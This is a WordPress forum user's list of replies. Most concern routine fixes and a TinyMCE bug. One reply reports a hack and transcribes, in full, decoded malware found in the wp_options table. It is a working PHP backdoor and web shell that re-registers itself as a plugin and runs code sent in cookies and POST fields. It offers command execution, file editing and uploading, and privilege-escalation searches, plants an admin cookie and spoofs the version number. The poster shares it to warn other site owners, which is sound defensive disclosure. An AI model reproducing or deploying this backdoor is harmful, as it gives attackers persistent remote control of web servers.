Forum Replies Created
Forum: Installing WordPress
In reply to: Fatal error: Allowed memory size….In my case I just added the following to my wp-config.php right before the ‘stop editing’ comment:
if( $_SERVER['SCRIPT_FILENAME'] == ABSPATH.'wp-admin/update-core.php' ) ini_set("memory_limit","64M");
Of course, that won’t work for everybody, but for its simplicity it’s worth the try.
Forum: Fixing WordPress
In reply to: Hack attempts on wordpress_options DB table?Forum: Fixing WordPress
In reply to: Hack attempts on wordpress_options DB table?Hi. I too got the same hack attempt as you. The behavior was different: it kept changing my WordPress reported version back to 2.5!! (I am using 2.5.1). I mean, through the scripts $wp_version started with 2.5.1 but when plugins were loaded, one plugin changed it back to 2.5. Checking the active_plugins options value, I got my usual plugins plus these two babys:
../../../../../../../../../../../../../../../../../../../../../../tmp/tmp4Z0MYa/sess_56b48e283b26c4dd342c25be2e4d22e7The .jpeg file was no longer existant, but the sess_ file did exist and, among a lot of garbled data between comment tags (/* */), it said:
The content at wordpress_options was:
;))”=szJ14iMnASPg4 ….snip…. JgsjIw1Gdi0DdjFGJ”(edoced_46esab(lave
Which after strrev() is:
eval(base64_decode(“JGFjdD0idG1wIjsgJF ….snip…. 4gPSAnMi41Jzs=”));
The base64 decodes to a HUGE script I transcribe at the end of this message. Unfortunately, I was not archiving my server access logs, so I don’t know where did this come from. My site is quite new (less than a month), and I remember doing the following sequence:
1) Install WordPress 2.5
2) Add plugins: Akismet, google-sitemap-generator, wp-chunk plus a couple of plugins of my own
3) Added my site to Technorati: DID THIS USING **Quick Claim**, which means I gave Technoratti the password of an admin user to my blog (I deleted this user right afterwards).
4) Upgrade to 2.5.1 (upgrade successful, although it kept saying it still was 2.5)Now I’m thinking I was a HUGE fool trusting Technorati, but perhaps it’s not their fault.
I advise everyone to check for a bogus “wordpress_options” row in their wp_options table.
PS: Here’s the script:
$act="tmp"; $tmp_shell="../../../../../../../../../../../../../../../../../../../../../../tmp/tmp4Z0MYa/sess_56b48e283b26c4dd342c25be2e4d22e7"; @chmod(substr($tmp_shell,0,strrpos($tmp_shell,"/")),0777); @chmod($tmp_shell,0777); @touch($tmp_shell); @chmod($tmp_shell,0555); if($act=="tmp") @chmod(substr($tmp_shell,0,strrpos($tmp_shell,"/")),0555); $lc="7c05c37921d74f503337ed3e365b86f2"; if(isset($_COOKIE[$lc])){ $lin=$_COOKIE[$lc]; echo("<!-- ex -->"); $lin=preg_replace("/_/", "+", $lin); eval(base64_decode($lin)); echo("<!-- /ex -->"); exit; } $ffunctxt='$p="'.$tmp_shell.'"; $a=get_option("active_plugins"); $b=false; if(is_array($a)) foreach($a as $k) if(strpos($k,$p)!==false) $b=true; if(!$b){ $a[]=$p; update_option("active_plugins",$a); }'; $ffunc=create_function('',$ffunctxt); add_action("update_option_active_plugins",$ffunc); if(md5($_COOKIE['_wp_debugger'])=="d0ea8a2b881c9372b304644f52116d81"){ eval(base64_decode($_POST['file'])); exit; } if(md5($_COOKIE['qwerty'])=="835059459e00d33d592321953532f2ea") { clearstatcache(); set_magic_quotes_runtime(0); if(!function_exists('ini_set')){ function ini_set(){ return FALSE; } } ini_set('output_buffering',0); if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited'; else $limit = get_cfg_var('max_execution_time'); if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){ $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; } if(@get_magic_quotes_gpc()){ foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v); } function execute($c){ if(function_exists('exec')){ @exec($c, $out); return @implode("\n", $out); }elseif(function_exists('shell_exec')){ $out = @shell_exec($c); return $out; }elseif(function_exists('system')){ @ob_start(); @system($c, $ret); $out = @ob_get_contents(); @ob_end_clean(); return $out; }elseif(function_exists('passthru')){ @ob_start(); @passthru($c, $ret); $out = @ob_get_contents(); @ob_end_clean(); return $out; }else{ return FALSE; } } function read($f){ $str = @file($f); if($str){ $out = implode('', $str); }elseif(function_exists('curl_version')){ @ob_start(); $h = @curl_init('file:/'.'/'.$f); @curl_exec($h); $out = @ob_get_contents(); @ob_end_clean(); }else{ $out = 'Could not read file!'; } return htmlspecialchars($out); } function write($f, $c){ $t = filemtime($f); $fp = @fopen($f, 'w'); if($fp){ fwrite($fp, $c); fclose($fp); $out = 'File saved.'."\n"; if($t && touch($f, $t)){ $out .= 'Last modification time changed.'; }else{ $out .= 'Could not change last modification time!'; } }else{ $out = 'Saving failed!'; } return $out; } function file_size($f){ $size = filesize($f); if($size < 1024) $size = $size.' b'; elseif($size < 1048576) $size = round($size/1024*100)/100 . ' Kb'; elseif($size < 1073741824) $size=round($size/1048576*100)/100 . ' Mb'; return $size; } if(!function_exists('natcasesort')){ function natcasesort($arr){ return sort($arr); } } if(!empty($_POST['dir'])){ $dir = $_POST['dir']; if(!@chdir($dir)) $out = 'chdir() failled!'; } $dir = getcwd(); (strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix'; if(!$os_name = @php_uname()){ if(function_exists('posix_uname')){ $os_name = posix_uname(); }elseif($os_name != getenv('OS')){ $os_name = ''; } } if(function_exists('posix_getpwuid')){ $data = posix_getpwuid(posix_getuid()); $user = $data['name'].' uid('.$data['uid'].') gid('.$data['gid'].')'; }else{ $user = ''; } $safe_mode = get_cfg_var('safe_mode'); $safe_mode ? $safe = 'on' : $safe = 'off'; execute('echo ssps') ? $execute = 'on' : $execute = 'off'; $server = getenv('SERVER_SOFTWARE'); if(!$server) $server = '---'; $out = ''; $tail = ''; $aliases = ''; if(!$safe_mode){ if($os_type == 'nix'){ $os .= execute('sysctl -n kern.ostype'); $os .= execute('sysctl -n kern.osrelease'); $os .= execute('sysctl -n kernel.ostype'); $os .= execute('sysctl -n kernel.osrelease'); if(empty($user)) $user = execute('id'); $aliases = array( '' => '', 'find suid files'=>'find / -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'show opened ports'=>'netstat -an | grep -i listen', ); }else{ $os_name .= execute('ver'); $user .= execute('echo %username%'); $aliases = array( '' => '', 'show runing services' => 'net start', 'show process list' => 'tasklist' ); } } if(!empty($_POST['cmd'])){ $out = execute($_POST['cmd']); } elseif(!empty($_POST['php'])){ ob_start(); eval($_POST['php']); $out = ob_get_contents(); ob_end_clean(); } elseif(!empty($_POST['edit'])){ $file = $_POST['edit']; $out = read($file); $tail = '<input type=hidden name=dir value="'.$dir.'"><input type=hidden name=efile value="'.$file.'"><br /><input type=submit>'; } elseif(!empty($_POST['save'])){ $out = write($_POST['efile'], $_POST['save']); } elseif(!empty($_POST['remove'])){ $obj = $_POST['remove']; @is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj); $res ? $out = 'Removed successfully' : $out = 'Removing failed!'; } elseif(!empty($_POST['newdir'])){ @mkdir($_POST['newdir']) ? $out = 'Directory created.' : $out = 'Could not create directory!'; } elseif(!empty($_POST['newfile'])){ @touch($_POST['newfile']) ? $out = 'File created.' : $out = 'Could not create file!'; } elseif(!empty($_POST['alias'])){ $out = execute($_POST['alias']); } elseif(!empty($_FILES['ufile']['tmp_name'])){ if(!is_uploaded_file($_FILES['ufile']['tmp_name']) || @!copy($_FILES['ufile']['tmp_name'],$dir.chr(47).$_FILES['ufile']['name'])) $out = 'Could not upload file'; else $out = 'Uploaded successfully.'; } print<<<here <style> table {font:9pt Tahoma;border-color:white} input,select,file {background-color:#eeeeee} textarea {background-color:#f2f2f2} </style> <br /> <center> <table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver> <tr> <td> <form method=post> <table cellpadding=1 cellspacing=0 border=1 width=650> here; if(!$safe_mode) print<<<here <tr> <td> cmd </td> <td colspan=8> <input type=text name=cmd size=97> </td> </tr> here; print<<<here <tr> <td> php </td> <td colspan=8> <input type=text name=php size=97> </td> </tr> <tr> <td> actions </td> <td> edit </td> <td> <input type=text name=edit size=14> </td> <td> remove </td> <td> <input type=text name=remove size=14> </td> <td> new_dir </td> <td> <input type=text name=newdir size=14> </td> <td> new_file </td> <td> <input type=text name=newfile size=15> </td> </tr> here; if($aliases){ print<<<here <tr> <td> aliases </td> <td colspan=8> <select name=alias> here; foreach($aliases as $k => $v){ print '<option value="'.$v.'">'.$k.'</option>'; } print<<<here </select> <input type=submit> </td> </tr> here; } print<<<here <tr> <td> dir </td> <td colspan=8> <input type=text value="{$dir}" name=dir size=97> </td> </tr> </form> <form method=post enctype=multipart/form-data> <tr> <td> upload </td> <td colspan=8> <input type=file name=ufile size=76> <input type=hidden name=dir value="{$dir}"> <input type=submit> </td> </tr> </form> </table> <table cellpadding=0 cellspacing=0 border=1 width=650> <form method=post> <tr valign=top> <td width=70% bgcolor=#dddddd> <b>OS:</b> {$os_name}<br /> <b>User:</b> {$user}<br /> <b>Server:</b> {$server}<br /> <b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit} </td> <td rowspan=2 bgcolor=#dddddd> <center>~:(expl0rer):~</center> here; if($dp = @openDir($dir)){ $cObj = readDir($dp); while($cObj){ if(@is_dir($cObj)) $theDirs[] = $cObj; elseif(@is_file($cObj)) $theFiles[] = $cObj; $cObj = readDir($dp); } closedir($dp); } if(!empty($theDirs)){ natcasesort($theDirs); if($os_type == 'nix'){ foreach($theDirs as $cDir){ $color='black'; if(is_writeable($cDir)){ $color='red'; }elseif(is_readable($cDir)){ $color='blue'; } print "<font color=".$color."><".$cDir."></font><br />"; } }else{ foreach($theDirs as $cDir){ $tmp = $cDir.'/.ssps_tmp'; if(@touch($tmp)){ $color='red'; unlink($tmp); }elseif(opendir($cDir)){ closedir(); $color='blue'; }else{ $color='black'; } print "<font color=".$color."><".$cDir."></font><br />"; } } } else print '<br />open_basedir restriction in effect. Allowed path is '.get_cfg_var('open_basedir'); print '<br />'; if(!empty($theFiles)){ natcasesort($theFiles); print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">'; foreach($theFiles as $cFile){ $size = file_size($cFile); if($fp = @fopen($cFile, 'a')) $color = 'red'; elseif($fp = @fopen($cFile, 'r')) $color='blue'; else $color = 'black'; @fclose($fp); print '<tr><td width=100%><font color='.$color.'>'.$cFile.'</font></td><td align=left>'.$size.'</tr>'; } print '</table>'; } print<<<here </td> </tr> <tr valign=top> <td align=center> <form method=post> ~:(results):~ <textarea name=save cols=55 rows=15>{$out}</textarea> {$tail} </form> </td> </tr> </table> </form> </td> </tr> </table> here; die; } if ( strpos($_SERVER['REQUEST_URI'], 'wp-trackback.php') !== false ) { echo '<?xml version="1.0" encoding="utf-8"?'.">\n"; echo "<response>\n"; echo "<error>1</error>\n"; echo "<message>$error_message</message>\n"; echo "</response>"; die(); } if ( (strpos($_SERVER['REQUEST_URI'], 'wp-login.php') !== false) && isset($_POST['log']) ) { setcookie('admin_cookie', '5d5d9dc61f9c78175addf2c0c6b1c878', time() + 31536000, '/', ''); } if ( (strpos($_SERVER['REQUEST_URI'], 'wp-admin') !== false) && ($_COOKIE['admin_cookie'] != '5d5d9dc61f9c78175addf2c0c6b1c878') ) { if ( file_exists(ABSPATH . WPINC . '/pluggable-functions.php') ) @include_once (ABSPATH . WPINC . '/pluggable-functions.php'); else @include_once (ABSPATH . WPINC . '/pluggable.php'); wp_clearcookie(); do_action('wp_logout'); @ header('Expires: Wed, 11 Jan 1984 05:00:00 GMT'); @ header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT'); @ header('Cache-Control: no-cache, must-revalidate, max-age=0'); @ header('Pragma: no-cache'); $redirect_to = '../wp-login.php'; if ( isset($_REQUEST['redirect_to']) ) $redirect_to = $_REQUEST['redirect_to']; wp_redirect($redirect_to); exit(); } global $wp_version; $wp_version = '2.5';
Forum: Fixing WordPress
In reply to: Image drag and drop problem with Firefox and TinyMCE on WP 2.0I filed this in trac as ticket #2612:
Forum: Everything else WordPress
In reply to: Cannot login into trac with forum password.Now it’s working. Thanks.
Forum: Everything else WordPress
In reply to: Cannot login into trac with forum password.Thanks, Kafkaesqui. I wasn’t aware that there was a server movement in progress. I’ll try next week.
Forum: Everything else WordPress
In reply to: Cannot login into trac with forum password.I would like to access trac with my own user. What can I do? Who should I contact for support?
Forum: Fixing WordPress
In reply to: Image drag and drop problem with Firefox and TinyMCE on WP 2.0OK, it is a bug, then. It seems that my password is not good for trac (at least yet; I registered just yesterday). I might try later.
Forum: Fixing WordPress
In reply to: Image drag and drop problem with Firefox and TinyMCE on WP 2.0Hi, HandySolo. Thanks for answering. With “Send to Editor” it works fine in both navigators. Only the drag and drop function seems to fail with Firefox. (Oh, yeah, I could use “send to editor” instead, but it would be nice to have it working right, wouldn’t it?). ??